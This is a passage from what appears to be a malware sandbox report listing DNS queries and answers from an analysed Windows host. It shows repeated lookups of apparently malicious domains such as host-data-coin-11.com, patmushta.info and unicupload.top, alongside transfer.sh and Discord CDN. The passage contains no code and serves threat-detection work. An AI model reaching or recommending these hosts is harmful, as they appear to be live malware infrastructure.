                                                                                                                                                    Jan 14, 2022 10:43:48.823563099 CET80496988.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.823586941 CET80496988.209.70.0192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 14, 2022 10:43:44.633687973 CET | 192.168.2.6 | 8.8.8.8 | 0x8523 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:45.077446938 CET | 192.168.2.6 | 8.8.8.8 | 0x6b8b | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:45.249844074 CET | 192.168.2.6 | 8.8.8.8 | 0xb24d | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:45.744626045 CET | 192.168.2.6 | 8.8.8.8 | 0x7fc2 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:46.185400963 CET | 192.168.2.6 | 8.8.8.8 | 0x1213 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:46.366353035 CET | 192.168.2.6 | 8.8.8.8 | 0x7ee1 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:48.028930902 CET | 192.168.2.6 | 8.8.8.8 | 0xf8ea | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:48.198477983 CET | 192.168.2.6 | 8.8.8.8 | 0xfb93 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:48.390367031 CET | 192.168.2.6 | 8.8.8.8 | 0x1b5e | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:50.684801102 CET | 192.168.2.6 | 8.8.8.8 | 0xc627 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:50.858036041 CET | 192.168.2.6 | 8.8.8.8 | 0x27bd | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:51.026129961 CET | 192.168.2.6 | 8.8.8.8 | 0x4517 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:51.332477093 CET | 192.168.2.6 | 8.8.8.8 | 0x1fe2 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:51.513241053 CET | 192.168.2.6 | 8.8.8.8 | 0x2f07 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:51.683567047 CET | 192.168.2.6 | 8.8.8.8 | 0xc35c | Standard query (0) | unicupload.top | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:51.847625017 CET | 192.168.2.6 | 8.8.8.8 | 0x34a3 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:52.016745090 CET | 192.168.2.6 | 8.8.8.8 | 0xad87 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:52.187030077 CET | 192.168.2.6 | 8.8.8.8 | 0x9243 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:52.367851019 CET | 192.168.2.6 | 8.8.8.8 | 0xbcdb | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:52.539206982 CET | 192.168.2.6 | 8.8.8.8 | 0x6463 | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:54.230817080 CET | 192.168.2.6 | 8.8.8.8 | 0x3b21 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:54.404676914 CET | 192.168.2.6 | 8.8.8.8 | 0x5292 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:54.578222036 CET | 192.168.2.6 | 8.8.8.8 | 0x6dba | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:54.775106907 CET | 192.168.2.6 | 8.8.8.8 | 0xfaf6 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:58.634373903 CET | 192.168.2.6 | 8.8.8.8 | 0xcd6c | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:58.833694935 CET | 192.168.2.6 | 8.8.8.8 | 0x9e96 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:59.021801949 CET | 192.168.2.6 | 8.8.8.8 | 0xfa32 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:59.187329054 CET | 192.168.2.6 | 8.8.8.8 | 0x4146 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:01.036515951 CET | 192.168.2.6 | 8.8.8.8 | 0x798d | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:01.201462030 CET | 192.168.2.6 | 8.8.8.8 | 0xa9a1 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:01.368493080 CET | 192.168.2.6 | 8.8.8.8 | 0xae6 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:10.079658031 CET | 192.168.2.6 | 8.8.8.8 | 0x63ad | Standard query (0) | microsoft-com.mail.protection.outlook.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:12.796425104 CET | 192.168.2.6 | 8.8.8.8 | 0xc715 | Standard query (0) | patmushta.info | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:22.727591991 CET | 192.168.2.6 | 8.8.8.8 | 0x1b8a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:22.909961939 CET | 192.168.2.6 | 8.8.8.8 | 0xa1e2 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:23.076080084 CET | 192.168.2.6 | 8.8.8.8 | 0x8f81 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:23.241534948 CET | 192.168.2.6 | 8.8.8.8 | 0xa5c6 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:23.735255957 CET | 192.168.2.6 | 8.8.8.8 | 0xe7ca | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:24.017632008 CET | 192.168.2.6 | 8.8.8.8 | 0x9fdc | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:24.186546087 CET | 192.168.2.6 | 8.8.8.8 | 0xf2be | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:24.353194952 CET | 192.168.2.6 | 8.8.8.8 | 0xce72 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:24.792356968 CET | 192.168.2.6 | 8.8.8.8 | 0xdfc3 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:24.984512091 CET | 192.168.2.6 | 8.8.8.8 | 0xe353 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:25.174129009 CET | 192.168.2.6 | 8.8.8.8 | 0x6a12 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:25.381947994 CET | 192.168.2.6 | 8.8.8.8 | 0x1cc3 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:25.549240112 CET | 192.168.2.6 | 8.8.8.8 | 0x74c | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:25.719943047 CET | 192.168.2.6 | 8.8.8.8 | 0xd01f | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:28.817889929 CET | 192.168.2.6 | 8.8.8.8 | 0xfbca | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:28.989167929 CET | 192.168.2.6 | 8.8.8.8 | 0x47e3 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:29.163213015 CET | 192.168.2.6 | 8.8.8.8 | 0x6797 | Standard query (0) | goo.su | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:29.556011915 CET | 192.168.2.6 | 8.8.8.8 | 0x8873 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:29.749594927 CET | 192.168.2.6 | 8.8.8.8 | 0x4608 | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:29.934479952 CET | 192.168.2.6 | 8.8.8.8 | 0xaef6 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:30.115786076 CET | 192.168.2.6 | 8.8.8.8 | 0x8de9 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:30.289908886 CET | 192.168.2.6 | 8.8.8.8 | 0x3976 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:30.467227936 CET192.168.2.68.8.8.80x94c2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:30.641408920 CET192.168.2.68.8.8.80xc9baStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:33.873652935 CET192.168.2.68.8.8.80x2966Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:34.136259079 CET192.168.2.68.8.8.80x58f7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:35.034046888 CET192.168.2.68.8.8.80xcd85Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:35.399838924 CET192.168.2.68.8.8.80x8f64Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:35.576474905 CET192.168.2.68.8.8.80x7ce8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:35.841660023 CET192.168.2.68.8.8.80x24fcStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:47.192677975 CET192.168.2.68.8.8.80x7b69Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:47.358232975 CET192.168.2.68.8.8.80xcb45Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:47.533195972 CET192.168.2.68.8.8.80x3945Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:47.725630999 CET192.168.2.68.8.8.80x3f25Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:53.396308899 CET192.168.2.68.8.8.80x935cStandard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:55.346837997 CET192.168.2.68.8.8.80xb5f1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:55.518959045 CET192.168.2.68.8.8.80x5f2bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:55.711636066 CET192.168.2.68.8.8.80xfd7bStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:59.094153881 CET192.168.2.68.8.8.80x6c83Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:59.588779926 CET192.168.2.68.8.8.80xa9eaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:59.792838097 CET192.168.2.68.8.8.80xc644Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:03.762748003 CET192.168.2.68.8.8.80x3885Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:03.944444895 CET192.168.2.68.8.8.80x721bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:04.970577955 CET192.168.2.68.8.8.80x721bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:05.367841005 CET192.168.2.68.8.8.80xaea6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:05.562896967 CET192.168.2.68.8.8.80x5e9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.775547028 CET192.168.2.68.8.8.80x2626Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:43.545881033 CET192.168.2.68.8.8.80xadaStandard query (0)patmushta.infoA (IP address)IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2022 10:43:44.922651052 CET | 8.8.8.8 | 192.168.2.6 | 0x8523 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:45.096684933 CET | 8.8.8.8 | 192.168.2.6 | 0x6b8b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:45.589972973 CET | 8.8.8.8 | 192.168.2.6 | 0xb24d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:46.031016111 CET | 8.8.8.8 | 192.168.2.6 | 0x7fc2 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:46.204824924 CET | 8.8.8.8 | 192.168.2.6 | 0x1213 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:46.676295996 CET | 8.8.8.8 | 192.168.2.6 | 0x7ee1 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:48.048309088 CET | 8.8.8.8 | 192.168.2.6 | 0xf8ea | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:48.216015100 CET | 8.8.8.8 | 192.168.2.6 | 0xfb93 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:48.703352928 CET | 8.8.8.8 | 192.168.2.6 | 0x1b5e | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:50.703531981 CET | 8.8.8.8 | 192.168.2.6 | 0xc627 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:50.876921892 CET | 8.8.8.8 | 192.168.2.6 | 0x27bd | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:51.042943001 CET | 8.8.8.8 | 192.168.2.6 | 0x4517 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:51.352010012 CET | 8.8.8.8 | 192.168.2.6 | 0x1fe2 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:51.532625914 CET | 8.8.8.8 | 192.168.2.6 | 0x2f07 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:51.788089991 CET | 8.8.8.8 | 192.168.2.6 | 0xc35c | No error (0) | unicupload.top | | 54.38.220.85 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:51.869045019 CET | 8.8.8.8 | 192.168.2.6 | 0x34a3 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:52.034235001 CET | 8.8.8.8 | 192.168.2.6 | 0xad87 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:52.204862118 CET | 8.8.8.8 | 192.168.2.6 | 0x9243 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:52.387742996 CET | 8.8.8.8 | 192.168.2.6 | 0xbcdb | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:52.558407068 CET | 8.8.8.8 | 192.168.2.6 | 0x6463 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:54.249917984 CET | 8.8.8.8 | 192.168.2.6 | 0x3b21 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:54.421777010 CET | 8.8.8.8 | 192.168.2.6 | 0x5292 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:54.597048998 CET | 8.8.8.8 | 192.168.2.6 | 0x6dba | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:54.793905973 CET | 8.8.8.8 | 192.168.2.6 | 0xfaf6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:58.653935909 CET | 8.8.8.8 | 192.168.2.6 | 0xcd6c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:58.851239920 CET | 8.8.8.8 | 192.168.2.6 | 0x9e96 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:59.039109945 CET | 8.8.8.8 | 192.168.2.6 | 0xfa32 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:59.207215071 CET | 8.8.8.8 | 192.168.2.6 | 0x4146 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:59.207215071 CET | 8.8.8.8 | 192.168.2.6 | 0x4146 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:59.207215071 CET | 8.8.8.8 | 192.168.2.6 | 0x4146 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:59.207215071 CET | 8.8.8.8 | 192.168.2.6 | 0x4146 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:43:59.207215071 CET | 8.8.8.8 | 192.168.2.6 | 0x4146 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:01.056061029 CET | 8.8.8.8 | 192.168.2.6 | 0x798d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:01.218846083 CET | 8.8.8.8 | 192.168.2.6 | 0xa9a1 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:01.385657072 CET | 8.8.8.8 | 192.168.2.6 | 0xae6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:10.106473923 CET | 8.8.8.8 | 192.168.2.6 | 0x63ad | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:10.106473923 CET | 8.8.8.8 | 192.168.2.6 | 0x63ad | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.54.36 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:10.106473923 CET | 8.8.8.8 | 192.168.2.6 | 0x63ad | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.53.36 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:10.106473923 CET | 8.8.8.8 | 192.168.2.6 | 0x63ad | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.212.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:10.106473923 CET | 8.8.8.8 | 192.168.2.6 | 0x63ad | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.1 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:10.106473923 CET | 8.8.8.8 | 192.168.2.6 | 0x63ad | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.24.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:12.815992117 CET | 8.8.8.8 | 192.168.2.6 | 0xc715 | No error (0) | patmushta.info | | 94.142.143.116 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:22.744677067 CET | 8.8.8.8 | 192.168.2.6 | 0x1b8a | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:22.927047968 CET | 8.8.8.8 | 192.168.2.6 | 0xa1e2 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:23.095449924 CET | 8.8.8.8 | 192.168.2.6 | 0x8f81 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:23.580354929 CET | 8.8.8.8 | 192.168.2.6 | 0xa5c6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:23.754772902 CET | 8.8.8.8 | 192.168.2.6 | 0xe7ca | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:24.036843061 CET | 8.8.8.8 | 192.168.2.6 | 0x9fdc | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:24.205995083 CET | 8.8.8.8 | 192.168.2.6 | 0xf2be | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:24.643091917 CET | 8.8.8.8 | 192.168.2.6 | 0xce72 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:24.812130928 CET | 8.8.8.8 | 192.168.2.6 | 0xdfc3 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:25.001595020 CET | 8.8.8.8 | 192.168.2.6 | 0xe353 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:25.193222046 CET | 8.8.8.8 | 192.168.2.6 | 0x6a12 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:25.401681900 CET | 8.8.8.8 | 192.168.2.6 | 0x1cc3 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:25.568310022 CET | 8.8.8.8 | 192.168.2.6 | 0x74c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:25.739336014 CET | 8.8.8.8 | 192.168.2.6 | 0xd01f | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:28.837270975 CET | 8.8.8.8 | 192.168.2.6 | 0xfbca | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:29.006572962 CET | 8.8.8.8 | 192.168.2.6 | 0x47e3 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:29.187659979 CET | 8.8.8.8 | 192.168.2.6 | 0x6797 | No error (0) | goo.su | | 104.21.38.221 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:29.187659979 CET | 8.8.8.8 | 192.168.2.6 | 0x6797 | No error (0) | goo.su | | 172.67.139.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:29.575335979 CET | 8.8.8.8 | 192.168.2.6 | 0x8873 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:29.766783953 CET | 8.8.8.8 | 192.168.2.6 | 0x4608 | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:29.957333088 CET | 8.8.8.8 | 192.168.2.6 | 0xaef6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:30.132836103 CET | 8.8.8.8 | 192.168.2.6 | 0x8de9 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:30.313347101 CET | 8.8.8.8 | 192.168.2.6 | 0x3976 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:30.487637043 CET | 8.8.8.8 | 192.168.2.6 | 0x94c2 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:30.968112946 CET | 8.8.8.8 | 192.168.2.6 | 0xc9ba | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:33.891127110 CET | 8.8.8.8 | 192.168.2.6 | 0x2966 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:34.155517101 CET | 8.8.8.8 | 192.168.2.6 | 0x58f7 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:35.060764074 CET | 8.8.8.8 | 192.168.2.6 | 0xcd85 | No error (0) | a0621298.xsph.ru | | 141.8.194.74 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:35.421783924 CET | 8.8.8.8 | 192.168.2.6 | 0x8f64 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:35.607868910 CET | 8.8.8.8 | 192.168.2.6 | 0x7ce8 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:35.867207050 CET | 8.8.8.8 | 192.168.2.6 | 0x24fc | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:47.210330963 CET | 8.8.8.8 | 192.168.2.6 | 0x7b69 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:47.377250910 CET | 8.8.8.8 | 192.168.2.6 | 0xcb45 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:47.552405119 CET | 8.8.8.8 | 192.168.2.6 | 0x3945 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:47.744528055 CET | 8.8.8.8 | 192.168.2.6 | 0x3f25 | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:53.510515928 CET | 8.8.8.8 | 192.168.2.6 | 0x935c | No error (0) | patmushta.info | | 94.142.143.116 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:55.367500067 CET | 8.8.8.8 | 192.168.2.6 | 0xb5f1 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:55.538839102 CET | 8.8.8.8 | 192.168.2.6 | 0x5f2b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:55.733985901 CET | 8.8.8.8 | 192.168.2.6 | 0xfd7b | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:59.429790974 CET | 8.8.8.8 | 192.168.2.6 | 0x6c83 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:59.608838081 CET | 8.8.8.8 | 192.168.2.6 | 0xa9ea | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:44:59.810125113 CET | 8.8.8.8 | 192.168.2.6 | 0xc644 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
